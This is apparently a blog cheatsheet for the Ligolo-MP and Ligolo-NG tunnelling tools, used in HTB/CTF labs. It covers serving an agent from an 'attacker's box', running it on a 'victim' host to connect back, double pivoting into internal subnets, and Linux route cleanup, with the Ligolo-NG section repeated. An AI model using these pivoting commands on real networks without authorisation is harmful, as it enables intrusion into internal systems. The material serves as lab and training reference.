Post

Ligolo-MP/Ligolo-NG Cheatsheet

Posted
Preview Image
By
11 min read
Ligolo-MP/Ligolo-NG Cheatsheet

Installation

From Source

Github Ligolo-MP

1
2
3
4

git clone https://github.com/ttpreport/ligolo-mp
cd ligolo-mp
sudo make install
sudo ligolo-mp

From Release

Download Binary From Release

1
2
3

ligolo-mp_linux_amd64 
chmod +x ./ligolo-mp_linux_amd64 
sudo ./ligolo-mp_linux_amd64

Dashboard overview

FlagMeaning
Agent is connected, relay is down
Agent is connected, relay is up
Agent is disconnected, relay is down

Navgating the dashboard with TAB

CTRL+A admin Panel
CTRL+N generate Client Binary
CTRL+T traceroute IP
CTRL+Q quit ligolo

Interfaces

This is a list of interfaces found on the compromised machine. It could be useful for easier navigation of internal networks: which interface to run a redirector on, which networks are potentially accessible via this particular session and so on.

Routes

A list of routes is here mainly for visibility purposes: as already mentioned, the selection highlight is synchronized with sessions and redirectors, also the visual markers (those colored flags) provide a good visual representation of the current state.

Its context menu allows for deletion of selected route.

Redirectors

This is functionally the same as routes, but represents redirectors.

Its context menu allows for deletion of selected route.

Local host

The IP 240.0.0.1 will act as the localhost IP of the public host

Ligolo-NG

Resolve Error of Listner

┌──[::IP::10.10.16.8]─[kasemsh@kasemsh]─[~] 1
└──╼ ཀ $ sudo lsof -i :11601                                                                                                                             
[sudo] password for kasemsh: 
COMMAND    PID USER FD   TYPE DEVICE SIZE/OFF NODE NAME
proxy   110838 root 3u  IPv6 393192      0t0  TCP *:11601 (LISTEN)
proxy   110838 root 7u  IPv6 374598      0t0  TCP kasemsh:11601->trilocor.local:51250 (ESTABLISHED)

┌──[::IP::10.10.16.8]─[kasemsh@kasemsh]─[~] 
└──╼ ཀ $ sudo kill -9 110838

Download Essentials

1
2
3
4
5
6
7
8

# Agent
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_windows_amd64.zip> -O ligolo-ng_agent_0.8.2_windows_amd64.zip

# Proxy
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz> -O ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz

# Updog command
sudo pacman -S python-updog

Use updog to share the agent.exe file

1
2

# On the attacker's box
updog -p 8080

Adding up our interface

1
2
3
4

sudo ip tuntap add user root mode tun ligolo  # adding interface 
sudo ip link set ligolo up                    # starting interface
sudo ip route list                            # checking route
sudo ip link delete ligolo                    # to delete interface

Strating our proxy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

  △   △
╭─ ◕‿◕ [ 10.10.16.112 ] 𖤍 [ ~/Tools/Windows-Tools/Ligolo] git:(main*)  
└─❥ ./proxy -selfcert                                                                                                                         [0]
INFO[0000] Loading configuration file ligolo-ng.yaml    
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
ERRO[0000] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \\/ / __ \\______/ __ \\/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\\__, /\\____/_/\\____/     /_/ /_/\\__, /  
        /____/                          /____/   

  Made in France ♥            by @Nicocha30!
  Version: 0.8.2

ligolo-ng »

On the target host

1
2
3

# Send out agent on target
# Start Ligolo agent
./agent  --connect 10.10.14.14:11601 -ignore-cert -retry

Start your sessions

1
2
3
4
5
6
7
8
9
10
11

# List your session
ligolo-ng » session

# Select session
ligolo-ng » 1

# Start your session
ligolo-ng » start

# ifconfig
ligolo-ng » ifconfig

Add your route for the target network

1

sudo ip route add 172.16.8.0/24 dev ligolo

Delete the Interface if problem w/ Traffic

1

sudo ip route del 192.168.98.0/24 dev tun0

Double Pivot

Add another logical Interface

1
2
3
4
5

# Add another logical interface

sudo ip tuntap add user root mode tun ligolo-double  # adding interface 
sudo ip link set ligolo-double up                    # starting interface
sudo ip route list                                   # checking route

Add a listener in Ligolo

1
2

listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
ligolo-ng » listener_list

On the victim’s side

1

.\\agent.exe -connect 172.16.139.10:11601 -ignore-cert -retry

Start the tunnel after the connection

1
2

# Starting our tunnel for the second interface (ligolo-double)
tunnel_start --tun ligolo-double

Add the route to the next subnet

1

sudo ip route add 172.16.6.0/24 dev ligolo-double

IP Route Management

View Current Routes

1
2
3
4

ip route list
ip route show
ip r  # Short form
route -n  # Alternative (older style)

Add Specific Route

1
2
3
4
5
6
7
8

# Basic syntax
sudo ip route add <network> dev <interface>
sudo ip route add <network> via <gateway> dev <interface>

# Examples
sudo ip route add 172.16.5.0/24 dev pivotl
sudo ip route add 10.10.10.0/24 via 10.10.14.1 dev tun0
sudo ip route add 192.168.1.0/24 via 10.10.14.50 dev tun0

Delete Specific Route

1
2
3
4
5
6
7

# Single route delete
sudo ip route del <network> dev <interface>

# Examples
sudo ip route del 172.16.5.0/24 dev pivotl
sudo ip route del 192.168.29.0/24 dev wlan0
sudo ip route del 10.10.10.0/23 via 10.10.14.1 dev tun0

Delete All Custom Routes (Clean Reset)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

# Method 1: Delete each route manually
sudo ip route del 10.10.10.0/23 via 10.10.14.1 dev tun0
sudo ip route del 10.10.14.0/23 dev tun0
sudo ip route del 10.129.0.0/16 dev tun0
sudo ip route del 172.16.5.0/24 dev pivotl
sudo ip route del 172.16.6.0/24 dev pivotl
sudo ip route del 172.17.0.0/16 dev docker0

# Method 2: Flush all routes for specific interface
sudo ip route flush dev tun0
sudo ip route flush dev pivotl
sudo ip route flush dev docker0

# Method 3: Flush entire routing table (DANGEROUS - will break network!)
sudo ip route flush table main  # Don't use unless you know what you're doing

Restart Network Interface (Fresh Start)

1
2
3
4
5
6
7
8
9
10

# Restart VPN/Tunnel interface
sudo ip link set tun0 down
sudo ip link set tun0 up

# For any interface
sudo ip link set <interface> down
sudo ip link set <interface> up

# Or reconnect VPN from scratch
sudo openvpn --config lab.ovpn  # Reconnect VPN

Network Service Restart

1
2
3
4
5
6
7
8
9

# Ubuntu/Debian
sudo systemctl restart networking
sudo systemctl restart NetworkManager

# Arch/Parrot
sudo systemctl restart NetworkManager

# Flush DNS cache too (if needed)
sudo systemd-resolve --flush-caches

Quick Commands for Your Scenario

1
2
3
4
5
6
7
8
9
10
11

# 1. Delete all pivot routes
sudo ip route flush dev pivotl

# 2. Delete VPN routes
sudo ip route flush dev tun0

# 3. Reconnect VPN fresh
sudo openvpn --config academy.ovpn

# 4. Verify clean state
ip route list

Understanding Route Components

1
2
3
4
5

10.10.10.0/23 via 10.10.14.1 dev tun0
│             │              │
│             │              └─ Interface to use
│             └─ Gateway IP (next hop)
└─ Destination network

Common Use Cases

HTB/CTF VPN Reset

1
2
3
4
5
6
7
8

# Kill old VPN
sudo killall openvpn

# Clear old routes
sudo ip route flush dev tun0

# Reconnect fresh
sudo openvpn --config academy.ovpn

Pivoting Cleanup

1
2
3
4
5

# Remove all pivot routes
sudo ip route flush dev pivotl

# Remove interface
sudo ip link del pivotl

LIGOLO

Resolve Error of Listner

┌──[::IP::10.10.16.8]─[kasemsh@kasemsh]─[~] 1
└──╼ ཀ $ sudo lsof -i :11601                                                                                                                             
[sudo] password for kasemsh: 
COMMAND    PID USER FD   TYPE DEVICE SIZE/OFF NODE NAME
proxy   110838 root 3u  IPv6 393192      0t0  TCP *:11601 (LISTEN)
proxy   110838 root 7u  IPv6 374598      0t0  TCP kasemsh:11601->trilocor.local:51250 (ESTABLISHED)

┌──[::IP::10.10.16.8]─[kasemsh@kasemsh]─[~] 
└──╼ ཀ $ sudo kill -9 110838

Download Essentials

1
2
3
4
5
6
7
8

# Agent
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_windows_amd64.zip> -O ligolo-ng_agent_0.8.2_windows_amd64.zip

# Proxy
wget <https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz> -O ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz

# Updog command
sudo pacman -S python-updog

Use updog to share the agent.exe file

1
2

# On the attacker's box
updog -p 8080

Adding up our interface

1
2
3
4

sudo ip tuntap add user root mode tun ligolo  # adding interface 
sudo ip link set ligolo up                    # starting interface
sudo ip route list                            # checking route
sudo ip link delete ligolo                    # to delete interface

Strating our proxy

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

  △   △
╭─ ◕‿◕ [ 10.10.16.112 ] 𖤍 [ ~/Tools/Windows-Tools/Ligolo] git:(main*)  
└─❥ ./proxy -selfcert                                                                                                                         [0]
INFO[0000] Loading configuration file ligolo-ng.yaml    
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
ERRO[0000] Certificate cache error: acme/autocert: certificate cache miss, returning a new certificate 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \\/ / __ \\______/ __ \\/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\\__, /\\____/_/\\____/     /_/ /_/\\__, /  
        /____/                          /____/   

  Made in France ♥            by @Nicocha30!
  Version: 0.8.2

ligolo-ng »

On the target host

1
2
3

# Send out agent on target
# Start Ligolo agent
./agent  --connect 10.10.14.14:11601 -ignore-cert -retry

Start your sessions

1
2
3
4
5
6
7
8
9
10
11

# List your session
ligolo-ng » session

# Select session
ligolo-ng » 1

# Start your session
ligolo-ng » start

# ifconfig
ligolo-ng » ifconfig

Add your route for the target network

1

sudo ip route add 172.16.8.0/24 dev ligolo

Delete the Interface if problem w/ Traffic

1

sudo ip route del 192.168.98.0/24 dev tun0

Double Pivot

Add another logical Interface

1
2
3
4
5

# Add another logical interface

sudo ip tuntap add user root mode tun ligolo-double  # adding interface 
sudo ip link set ligolo-double up                    # starting interface
sudo ip route list                                   # checking route

Add a listener in Ligolo

1
2

listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
ligolo-ng » listener_list

On the victim’s side

1

.\\agent.exe -connect 172.16.139.10:11601 -ignore-cert -retry

Start the tunnel after the connection

1
2

# Starting our tunnel for the second interface (ligolo-double)
tunnel_start --tun ligolo-double

Add the route to the next subnet

1

sudo ip route add 172.16.6.0/24 dev ligolo-double

IP Route Management

View Current Routes

1
2
3
4

ip route list
ip route show
ip r  # Short form
route -n  # Alternative (older style)

Add Specific Route

1
2
3
4
5
6
7
8

# Basic syntax
sudo ip route add <network> dev <interface>
sudo ip route add <network> via <gateway> dev <interface>

# Examples
sudo ip route add 172.16.5.0/24 dev pivotl
sudo ip route add 10.10.10.0/24 via 10.10.14.1 dev tun0
sudo ip route add 192.168.1.0/24 via 10.10.14.50 dev tun0

Delete Specific Route

1
2
3
4
5
6
7

# Single route delete
sudo ip route del <network> dev <interface>

# Examples
sudo ip route del 172.16.5.0/24 dev pivotl
sudo ip route del 192.168.29.0/24 dev wlan0
sudo ip route del 10.10.10.0/23 via 10.10.14.1 dev tun0

Delete All Custom Routes (Clean Reset)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

# Method 1: Delete each route manually
sudo ip route del 10.10.10.0/23 via 10.10.14.1 dev tun0
sudo ip route del 10.10.14.0/23 dev tun0
sudo ip route del 10.129.0.0/16 dev tun0
sudo ip route del 172.16.5.0/24 dev pivotl
sudo ip route del 172.16.6.0/24 dev pivotl
sudo ip route del 172.17.0.0/16 dev docker0

# Method 2: Flush all routes for specific interface
sudo ip route flush dev tun0
sudo ip route flush dev pivotl
sudo ip route flush dev docker0

# Method 3: Flush entire routing table (DANGEROUS - will break network!)
sudo ip route flush table main  # Don't use unless you know what you're doing

Restart Network Interface (Fresh Start)

1
2
3
4
5
6
7
8
9
10

# Restart VPN/Tunnel interface
sudo ip link set tun0 down
sudo ip link set tun0 up

# For any interface
sudo ip link set <interface> down
sudo ip link set <interface> up

# Or reconnect VPN from scratch
sudo openvpn --config lab.ovpn  # Reconnect VPN

Network Service Restart

1
2
3
4
5
6
7
8
9

# Ubuntu/Debian
sudo systemctl restart networking
sudo systemctl restart NetworkManager

# Arch/Parrot
sudo systemctl restart NetworkManager

# Flush DNS cache too (if needed)
sudo systemd-resolve --flush-caches

Quick Commands for Your Scenario

1
2
3
4
5
6
7
8
9
10
11

# 1. Delete all pivot routes
sudo ip route flush dev pivotl

# 2. Delete VPN routes
sudo ip route flush dev tun0

# 3. Reconnect VPN fresh
sudo openvpn --config academy.ovpn

# 4. Verify clean state
ip route list

Understanding Route Components

1
2
3
4
5

10.10.10.0/23 via 10.10.14.1 dev tun0
│             │              │
│             │              └─ Interface to use
│             └─ Gateway IP (next hop)
└─ Destination network

Common Use Cases

HTB/CTF VPN Reset

1
2
3
4
5
6
7
8

# Kill old VPN
sudo killall openvpn

# Clear old routes
sudo ip route flush dev tun0

# Reconnect fresh
sudo openvpn --config academy.ovpn

Pivoting Cleanup

1
2
3
4
5

# Remove all pivot routes
sudo ip route flush dev pivotl

# Remove interface
sudo ip link del pivotl
CheetSheets
tunnling ligolo-mp ligolo-ng
This post is licensed under CC BY 4.0 by the author.